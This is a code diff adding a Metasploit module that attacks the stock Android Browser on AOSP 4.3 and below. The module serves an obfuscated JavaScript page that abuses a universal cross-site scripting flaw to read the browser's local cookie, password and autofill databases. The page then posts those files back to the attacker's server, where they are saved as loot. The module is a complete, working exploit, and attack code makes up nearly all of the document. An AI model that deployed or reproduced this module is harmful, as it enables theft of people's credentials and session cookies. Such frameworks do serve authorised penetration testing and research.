|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'msf/core/exploit/jsobfu' |
| 8 | + |
| 9 | +class Metasploit3 < Msf::Auxiliary |
| 10 | + |
| 11 | + include Msf::Exploit::Remote::HttpServer::HTML |
| 12 | + include Msf::Auxiliary::Report |
| 13 | + include Msf::Exploit::JSObfu |
| 14 | + |
| 15 | + def initialize(info={}) |
| 16 | + super(update_info(info, |
| 17 | + 'Name' => 'Android Browser File Theft', |
| 18 | + 'Description' => %q{ |
| 19 | + This module steals the cookie, password, and autofill databases from the |
| 20 | + Browser application on AOSP 4.3 and below. |
| 21 | + }, |
| 22 | + 'Author' => [ |
| 23 | + 'Rafay Baloch', # Found UXSS bug in Android Browser |
| 24 | + 'joev' # File redirect and msf module |
| 25 | + ], |
| 26 | + 'License' => MSF_LICENSE, |
| 27 | + 'Actions' => [[ 'WebServer' ]], |
| 28 | + 'PassiveActions' => [ 'WebServer' ], |
| 29 | + 'References' => |
| 30 | + [ |
| 31 | + ['URL', 'https://code.google.com/p/chromium/issues/detail?id=90222'] # the UXSS |
| 32 | + ], |
| 33 | + 'DefaultAction' => 'WebServer' |
| 34 | + )) |
| 35 | + |
| 36 | + register_options([ |
| 37 | + OptString.new('ADDITIONAL_FILES', [ |
| 38 | + false, |
| 39 | + 'Comma-separated list of addition file URLs to steal.', |
| 40 | + ]), |
| 41 | + OptBool.new('DEFAULT_FILES', [ |
| 42 | + true, |
| 43 | + 'Steals a default set of file URLs', |
| 44 | + true |
| 45 | + ]) |
| 46 | + ], self.class) |
| 47 | + end |
| 48 | + |
| 49 | + def run |
| 50 | + exploit |
| 51 | + end |
| 52 | + |
| 53 | + def on_request_uri(cli, request) |
| 54 | + if request.method.downcase == 'post' |
| 55 | + process_post(cli, request) |
| 56 | + send_response_html(cli, '') |
| 57 | + else |
| 58 | + print_status("Sending exploit landing page...") |
| 59 | + send_response_html(cli, exploit_html) |
| 60 | + end |
| 61 | + end |
| 62 | + |
| 63 | + def process_post(cli, request) |
| 64 | + data = JSON.parse(request.body) |
| 65 | + file = File.basename(data['url']) |
| 66 | + print_good "File received: #{request.body.length.to_f/1024}kb #{file}" |
| 67 | + loot_path = store_loot( |
| 68 | + file, |
| 69 | + 'application/x-sqlite3', |
| 70 | + cli.peerhost, |
| 71 | + data, |
| 72 | + File.basename(data['url']), |
| 73 | + "#{cli.peerhost.ljust(16)} Android browser file" |
| 74 | + ) |
| 75 | + print_good "Saved to: #{loot_path}" |
| 76 | + end |
| 77 | + |
| 78 | + |
| 79 | + def file_urls |
| 80 | + default_urls = [ |
| 81 | + 'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db', |
| 82 | + 'file:///data/data/com.android.browser/databases/webview.db', |
| 83 | + 'file:///data/data/com.android.browser/databases/autofill.db', |
| 84 | + 'file:///data/data/com.android.browser/databases/browser2.db', |
| 85 | + 'file:///data/data/com.android.browser/app_appcache/ApplicationCache.db', |
| 86 | + 'file:///data/data/com.android.browser/app_databases/Databases.db', |
| 87 | + 'file:///data/data/com.android.browser/databases/webviewCookiesChromiumPrivate.db' |
| 88 | + ] |
| 89 | + |
| 90 | + unless datastore['DEFAULT_FILES'] |
| 91 | + default_urls = [] |
| 92 | + end |
| 93 | + |
| 94 | + default_urls + (datastore['ADDITIONAL_FILES']||'').split(',') |
| 95 | + end |
| 96 | + |
| 97 | + def exploit_html |
| 98 | + %Q| |
| 99 | + <!doctype html> |
| 100 | + <html> |
| 101 | + <body> |
| 102 | + <script>#{exploit_js}</script> |
| 103 | + </body> |
| 104 | + </html> |
| 105 | + | |
| 106 | + end |
| 107 | + |
| 108 | + def exploit_js |
| 109 | + js_obfuscate %Q| |
| 110 | +
|
| 111 | + window.onmessage = function(e) { |
| 112 | + var x = new XMLHttpRequest; |
| 113 | + x.open("POST", location.href); |
| 114 | + x.send(JSON.stringify(e.data)) |
| 115 | + }; |
| 116 | +
|
| 117 | + var brokenFrame = document.createElement('iframe'); |
| 118 | + brokenFrame.src = 'http://localhost:100'; |
| 119 | + brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;') |
| 120 | + brokenFrame.onload = function() { |
| 121 | + brokenFrame.onload = null; |
| 122 | + document.documentURI = 'javascript://hostname.com/%0D%0Aurls=(#{JSON.generate(file_urls)});'+ |
| 123 | + 'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+ |
| 124 | + 'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+ |
| 125 | + 'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+ |
| 126 | + 'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+ |
| 127 | + 'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+ |
| 128 | + 'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+ |
| 129 | + 'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();'; |
| 130 | + brokenFrame.contentWindow.location = ""; |
| 131 | + }; |
| 132 | +
|
| 133 | + document.body.appendChild(brokenFrame); |
| 134 | + | |
| 135 | + end |
| 136 | + |
| 137 | +end |
0 commit comments